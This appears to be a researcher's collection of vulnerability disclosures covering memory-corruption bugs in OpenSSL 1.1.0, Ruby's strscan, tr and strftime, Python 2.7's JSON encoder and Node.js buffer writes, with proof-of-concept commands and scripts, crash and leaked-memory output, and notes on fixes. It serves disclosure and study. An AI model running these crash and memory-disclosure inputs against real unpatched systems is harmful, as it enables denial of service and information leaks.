OpenSSL 1.1.0: remote client memory corruption in ssl_add_clienthello_tlsext()

This requires session tickets, a client that requests certificate status from the server, and a very large ALPN list. The last requirement — that the client sets a very large ALPN list — is very unlikely in a real-world application, which is why OpenSSL is treating this issue as a bug rather than a vulnerability, and I agree with this assessment. I’m publishing it because I think it’s nonetheless an interesting case.

Modify the server so that it will send a large ticket. What I did was
edit tls_construct_new_session_tickets so that the buffer is large
enough:

3051     if (!BUF_MEM_grow(s->init_buf,
3052                       SSL_HM_HEADER_LENGTH(s) + 6 + sizeof(key_name) +
3053                       EVP_MAX_IV_LENGTH + EVP_MAX_BLOCK_LENGTH +
3054                       EVP_MAX_MD_SIZE + slen + 0xFFFF))
3055         goto err;

adjust ticket size:

3132     p += hlen;
3133     p += 16022;
3134     /* Now write out lengths: p points to end of data written */
3135     /* Total length */

(I added the line with 16022).

Run the server like this:

openssl s_server -alpn 'x'

Run the client like this:

openssl s_client -reconnect -status -alpn `python -c "import sys;
sys.stdout.write('x,'*4000+'x')"`

This should result in a crash.

This is due to an invalid size check in the TLSEXT_STATUSTYPE_ocsp
part of ssl_add_clienthello_tlsext:

1264         if ((long)(limit - ret - 7 - extlen - idlen) < 0)
1265             return NULL;
1266         s2n(TLSEXT_TYPE_status_request, ret);
1267         if (extlen + idlen > 0xFFF0)
1268             return NULL;
1269         s2n(extlen + idlen + 5, ret);
1270         *(ret++) = TLSEXT_STATUSTYPE_ocsp;
1271         s2n(idlen, ret);
1272         for (i = 0; i < sk_OCSP_RESPID_num(s->tlsext_ocsp_ids); i++) {
1273             /* save position of id len */
1274             unsigned char *q = ret;
1275             id = sk_OCSP_RESPID_value(s->tlsext_ocsp_ids, i);
1276             /* skip over id len */
1277             ret += 2;
1278             itmp = i2d_OCSP_RESPID(id, &ret);
1279             /* write id len */
1280             s2n(itmp, q);
1281         }
1282         s2n(extlen, ret);
1283         if (extlen > 0)
1284             i2d_X509_EXTENSIONS(s->tlsext_ocsp_exts, &ret);

That is s2n (2 bytes), s2n (2 bytes), ret++ (1 byte), s2n (2 bytes), and then the s2n on line 1282 (2 bytes): 9 bytes of fixed overhead in total, but the check on line 1264 only accounts for 7 of them. Using a specially crafted ticket size you can ensure that ‘ret’ ends up 2 bytes PAST ‘limit’ after this routine.
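The arithmetic behind the overrun, tallied in a small Python sketch (byte counts taken from the code above; the extlen and idlen payload bytes appear on both sides of the check and cancel out):

```python
# Fixed-size writes performed by the TLSEXT_STATUSTYPE_ocsp block,
# excluding the extlen/idlen payload bytes (which the check does cover):
writes = [
    2,  # s2n(TLSEXT_TYPE_status_request, ret)
    2,  # s2n(extlen + idlen + 5, ret)
    1,  # *(ret++) = TLSEXT_STATUSTYPE_ocsp
    2,  # s2n(idlen, ret)
    2,  # s2n(extlen, ret)   <- line 1282, not accounted for
]
fixed_overhead = sum(writes)
checked = 7  # the check on line 1264: limit - ret - 7 - extlen - idlen
overrun = fixed_overhead - checked
print(fixed_overhead, overrun)  # 9 2: 9 bytes written, 2 of them unchecked
```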

Then in the ALPN writing routine later this happens:

1324     if (s->alpn_client_proto_list && !s->s3->tmp.finish_md_len) {
1325         if ((size_t)(limit - ret) < 6 + s->alpn_client_proto_list_len)
1326             return NULL;

limit - ret is cast to size_t, so instead of -2 it becomes a very large value, and execution passes this check.
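The effect of that cast can be modelled in Python by reducing the negative difference modulo 2^64 (assuming a 64-bit size_t; on 32-bit the same happens modulo 2^32):

```python
SIZE_MOD = 2**64  # assume a 64-bit size_t

limit_minus_ret = -2                       # ret is 2 bytes past limit
as_size_t = limit_minus_ret % SIZE_MOD     # what the (size_t) cast yields
print(hex(as_size_t))                      # 0xfffffffffffffffe

alpn_len = 8001                            # len('x,' * 4000 + 'x')
# The check `(size_t)(limit - ret) < 6 + alpn_client_proto_list_len`
# is false for this huge value, so there is no early return:
print(as_size_t < 6 + alpn_len)            # False
```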

Then the memcpy a few lines later causes the crash.

It doesn’t crash immediately after ‘ret’ crosses ‘limit’ because the
buffer is over-allocated by the code in crypto/buffer/buffer.c:

 87     /* This limit is sufficient to ensure (len+3)/3*4 < 2**31 */
 88     if (len > LIMIT_BEFORE_EXPANSION) {
 89         BUFerr(BUF_F_BUF_MEM_GROW, ERR_R_MALLOC_FAILURE);
 90         return 0;
 91     }
 92     n = (len + 3) / 3 * 4;

which is why a relatively large ALPN size is required for the crash.
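A sketch of that over-allocation in Python: BUF_MEM_grow rounds the allocation up to (len+3)/3*4, leaving roughly a third of the requested length as slack, so a small overrun usually still lands in mapped memory. The 20000 below is illustrative, not a value taken from the handshake code:

```python
def buf_mem_grow_alloc(length):
    # crypto/buffer/buffer.c: n = (len + 3) / 3 * 4 (C integer division)
    return (length + 3) // 3 * 4

length = 20000                 # hypothetical requested buffer length
alloc = buf_mem_grow_alloc(length)
slack = alloc - length
print(alloc, slack)            # 26668 6668: ~33% slack past the request
```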

Note that nothing out of the ordinary will happen if the server sends normal-sized tickets.

And just to be clear, you don’t need to modify the client source code to make this work. You only need to modify the server code (a separate build if you want) so it sends large tickets.

32-bit Ruby arbitrary length OOB read in strscan module

require 'strscan'
x = 'x' * 0x7FFFFFFE
s = StringScanner.new(x)
s.pos = 0x7FFFFFFD
t = s.peek(40000)
t.each_byte do |i|
    if i != 0
        print i.chr
    end
end

$ ./ruby poc.rb | strings
@	;>@V`TdBE
__gmon_start___fini_ITM_deregisterTMCloneTable_ITM_registerTMCloneTable__cxa_finalize_Jv_RegisterClassesonig_region_memsizeonig_region_freeruby_xfreerb_gc_markrb_check_typeddatarb_num2longrb_eRangeErrorrb_raiserb_int2bigrb_eArgErrorrb_string_valuerb_reg_region_copyrb_memerrorrb_data_typed_object_zalloconig_region_initrb_str_newrb_str_dumprb_str_new_staticrb_str_catrb_funcallrb_str_lengthrb_str_appendrb_error_arityrb_warningrb_enc_copyrb_sym2strrb_enc_getonig_name_to_backref_numberrb_eIndexErrorrb_enc_raiseonig_region_clearonig_region_setrb_enc_mbclenrb_check_typerb_reg_prepare_reonig_matchonig_freeonig_searchrb_obj_classrb_sprintfInit_strscanrb_cObjectrb_define_classrb_eStandardErrorrb_define_class_underrb_const_definedrb_obj_freezerb_const_setrb_define_alloc_funcrb_define_private_methodrb_define_singleton_methodrb_define_methodrb_intern2rb_aliaslibpthread.so.0libdl.so.2libcrypt.so.1libm.so.6libc.so.6_edata__bss_start_endGLIBC_2.1.3
[...]
uninitialized StringScanner objectunscan failed: previous match record not existStringScanner#empty? is obsolete; use #eos? insteadundefined group name reference: %.*sStringScanner#getbyte is obsolete; use #get_byte insteadStringScanner#peep is obsolete; use #peek insteadStringScanner#clear is obsolete; use #terminate insteadStringScanner#restsize is obsolete; use #rest_size instead$Id: strscan.c 53715 2016-02-02 04:39:44Z naruse $index out of range...regexp buffer overflow#<%li
 (uninitialized)>#<%li
 fin>#<%li
 %ld/%ld @ %li
>#<%li
 %ld/%ld %li
 @ %li
>ScanErrorbytesliceStringScanner0.7.0VersionIdinitializeinitialize_copymust_C_versionresetterminateclearstringstring=concat<<pos=charpospointerpointer=skipmatch?checkscan_fullscan_untilskip_untilexist?check_untilsearch_fullgetchget_bytegetbytepeekpeepunscanbeginning_of_line?bol?eos?empty?rest?matched?matchedmatched_size[]pre_matchpost_matchrestrest_sizerestsizeinspect
[...]
GCC: (Debian 4.9.2-10) 4.9.2
[...]

Fixed in git master.
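One plausible mechanism for the out-of-bounds read (my assumption, not confirmed against the strscan source): the scanner computes pos + peek length in a signed 32-bit integer, the sum wraps negative, and a bounds check of the form `end > len` no longer limits the read. Simulated in Python with 32-bit wrapping:

```python
def to_int32(x):
    # Wrap to a signed 32-bit value, as C `int` arithmetic would.
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x >= 0x80000000 else x

string_len = 0x7FFFFFFE   # 'x' * 0x7FFFFFFE
pos = 0x7FFFFFFD          # s.pos = 0x7FFFFFFD
peek_len = 40000          # s.peek(40000)

end = to_int32(pos + peek_len)
print(end)                # -2147443651: the sum wrapped negative
print(end > string_len)   # False -> a naive `end > len` clamp never fires
```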

Python 2.7 32-bit heap corruption in JSON encoder

The ascii_escape_str and ascii_escape_unicode functions in Python 2.7 are prone to a heap corruption vulnerability. There are various paths to these functions that trigger it; one of them is encoding a dict object with a very large key:

python -c 'import json;json.dumps({chr(0x22)*0x2AAAAAAB:0})'
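My reading of why this particular key length is chosen (the expansion factor of 6 bytes per escaped character, as in \u0022, is an assumption on my part): the output-size computation wraps a 32-bit size_t, yielding a tiny buffer for a huge input. Sketched in Python:

```python
MASK32 = 0xFFFFFFFF  # simulate a 32-bit size_t

key_len = 0x2AAAAAAB            # length of the dict key in the PoC
expansion = 6                   # assumed worst-case bytes per escaped char
alloc = (key_len * expansion) & MASK32
print(alloc)                    # 2: the escape buffer is far too small
```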

A fix has been implemented: https://hg.python.org/cpython/rev/9375c8834448

Node.js memory corruption from JavaScript as a feature

Update 26 Sept 2016: a fix is being prepared at https://github.com/nodejs/node/issues/8724

As I was casually browsing the Node.js 6.6.0 source code I stumbled upon this suspicious piece of code.

src/node_buffer.cc:

 816 template <typename T, enum Endianness endianness>
 817 void WriteFloatGeneric(const FunctionCallbackInfo<Value>& args) {
 818   Environment* env = Environment::GetCurrent(args);
 819 
 820   bool should_assert = args.Length() < 4;
 821 
 822   if (should_assert) {
 823     THROW_AND_RETURN_UNLESS_BUFFER(env, args[0]);
 824   }
 825 
 826   Local<Uint8Array> ts_obj = args[0].As<Uint8Array>();
 827   ArrayBuffer::Contents ts_obj_c = ts_obj->Buffer()->GetContents();
 828   const size_t ts_obj_offset = ts_obj->ByteOffset();
 829   const size_t ts_obj_length = ts_obj->ByteLength();
 830   char* const ts_obj_data =
 831       static_cast<char*>(ts_obj_c.Data()) + ts_obj_offset;
 832   if (ts_obj_length > 0)
 833     CHECK_NE(ts_obj_data, nullptr);
 834 
 835   T val = args[1]->NumberValue(env->context()).FromMaybe(0);
 836   size_t offset = args[2]->IntegerValue(env->context()).FromMaybe(0);
 837 
 838   size_t memcpy_num = sizeof(T);
 839 
 840   if (should_assert) {
 841     CHECK_NOT_OOB(offset + memcpy_num >= memcpy_num);
 842     CHECK_NOT_OOB(offset + memcpy_num <= ts_obj_length);
 843   }
 844 
 845   if (offset + memcpy_num > ts_obj_length)
 846     memcpy_num = ts_obj_length - offset;
 847 
 848   union NoAlias {
 849     T val;
 850     char bytes[sizeof(T)];
 851   };
 852 
 853   union NoAlias na = { val };
 854   char* ptr = static_cast<char*>(ts_obj_data) + offset;
 855   if (endianness != GetEndianness())
 856     Swizzle(na.bytes, sizeof(na.bytes));
 857   memcpy(ptr, na.bytes, memcpy_num);
 858 }

As you can see, should_assert is set to false when a 4th argument is present, which skips the bounds checks on the offset.

This is what the documentation says about it:

https://nodejs.org/api/buffer.html#buffer_buf_writefloatbe_value_offset_noassert

buf.writeFloatBE(value, offset[, noAssert])
#
buf.writeFloatLE(value, offset[, noAssert])
#
Added in: v0.11.15

    value <Number> Number to be written to buf
    offset <Integer> Where to start writing. Must satisfy: 0 <= offset <= buf.length - 4
    noAssert <Boolean> Skip value and offset validation? Default: false
    Return: <Integer> offset plus the number of bytes written

Writes value to buf at the specified offset with specified endian format (writeFloatBE() writes big endian, writeFloatLE() writes little endian). value should be a valid 32-bit float. Behavior is undefined when value is anything other than a 32-bit float.

Setting noAssert to true allows the encoded form of value to extend beyond the end of buf, but the result should be considered undefined behavior.

So it’s not a bug but a feature...

Let’s try it on 64 bit:

node-v6.6.0$ ./node -e 'new Buffer(10).writeFloatBE(1, 0xFFFFFFFFFFFFFFFF-3000, 1);'
Segmentation fault

Groovy!
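Tracing the PoC’s arithmetic through WriteFloatGeneric, modelled in Python with 64-bit wrapping: since noAssert is set, the CHECK_NOT_OOB checks on lines 841-842 are skipped, the clamp on lines 845-846 underflows, and the destination pointer wraps to an address before the buffer:

```python
MOD64 = 2**64  # simulate 64-bit size_t / pointer arithmetic

buf_len = 10                          # new Buffer(10)
offset = 0xFFFFFFFFFFFFFFFF - 3000    # the PoC's offset argument
memcpy_num = 4                        # sizeof(float)

# should_assert is false, so the CHECK_NOT_OOB checks are skipped.
# The clamp on lines 845-846 then underflows:
if (offset + memcpy_num) % MOD64 > buf_len:
    memcpy_num = (buf_len - offset) % MOD64

ptr_delta = offset % MOD64            # ts_obj_data + offset wraps around
print(memcpy_num)                     # 3011: a 3011-byte copy...
print(ptr_delta - MOD64)              # -3001: ...starting before the buffer
```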

Disclaimer: I never use Node.js and I know next to nothing about it. Maybe there is a good use for this “feature” (but what?), but other popular high-level languages have a zero-tolerance policy with regard to raw memory corruption from scripts (see the Python, Ruby, Perl, PHP, etc. vulnerabilities in the Internet Bug Bounty program).

Ruby vulnerability: heap corruption in string.c tr_trans() due to undersized buffer

Response by Ruby team: “severe but usual bug, not a vulnerability.”
Fixed in https://github.com/ruby/ruby/commit/cc9f1e919518edbee41d602ce215175f52f8f5f5

Configure with AddressSanitizer (ASAN):

mkdir install; CFLAGS="-fsanitize=address" ./configure \
    --disable-install-doc --disable-install-rdoc --disable-install-capi \
    --prefix=`realpath ./install` && make -j4 && make install

Then execute:

$ ./ruby -e '"a".encode("utf-32").tr("b".encode("utf-32"),
"c".encode("utf-32"))'
=================================================================
==17122==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x602000014a98 at pc 0x7ff04065cf01 bp 0x7ffdfe7629b0 sp 0x7ffdfe7629a8
WRITE of size 4 at 0x602000014a98 thread T0
...
...

The actual corruption occurs here:

6196     TERM_FILL(t, rb_enc_mbminlen(enc));
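My reading of the report (a sketch of the presumed mechanism, not the actual string.c buffer logic): the result buffer reserves room for a single terminator byte, while TERM_FILL writes rb_enc_mbminlen(enc) bytes, which is 4 for UTF-32. Modelled in Python:

```python
# Hypothetical model of the undersized buffer: capacity reserves one
# terminator byte, but TERM_FILL writes mbminlen bytes for the encoding.
content_len = 4               # one UTF-32 character, e.g. "a" in UTF-32
capacity = content_len + 1    # assumed: room for a single NUL terminator
mbminlen = 4                  # rb_enc_mbminlen for UTF-32

term_end = content_len + mbminlen  # TERM_FILL writes [content_len, term_end)
overflow = term_end - capacity
print(overflow)               # 3 bytes written past the allocation
```

This is consistent with the ASAN report above (“WRITE of size 4” at the end of a heap chunk), but the exact sizing logic is an assumption.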

Ruby vulnerability: heap corruption in DateTime.strftime() on 32 bit for certain format strings

Response by Ruby team: “severe but usual bug, not a vulnerability.”
Fixed in https://github.com/ruby/ruby/commit/58e8c9c895cc21473d6e46978666016a6e627d5f

If a very high precision is set in the date_strftime_with_tmx() function,
the following check (in the STRFTIME macro in date_strftime.c) will not
work as expected when s >= 0x80000000:

124         if (start + maxsize < s + precision) {          \
125             errno = ERANGE;                 \
126             return 0;                       \
127         }
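Simulating the failing check with 32-bit wrapping in Python (the addresses below are hypothetical): once s + precision wraps past 2^32, it compares smaller than start + maxsize and the ERANGE path is never taken:

```python
MASK32 = 0xFFFFFFFF       # simulate 32-bit pointer arithmetic

start = 0x80000000        # hypothetical output buffer address
maxsize = 100
s = start + 16            # current write position, a few bytes in
precision = 2147483647    # from "%2147483647c"

lhs = (start + maxsize) & MASK32
rhs = (s + precision) & MASK32   # wraps past 2**32 to a tiny value
wrapped = rhs < s
check_fires = lhs < rhs          # the `if` on line 124
print(wrapped, check_fires)      # True False: the overflow goes undetected
```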

This code causes a crash on my 32 bit system:

require 'date'
DateTime.now.strftime("%2147483647c")

64-bit is probably not affected (technically possible, but unlikely).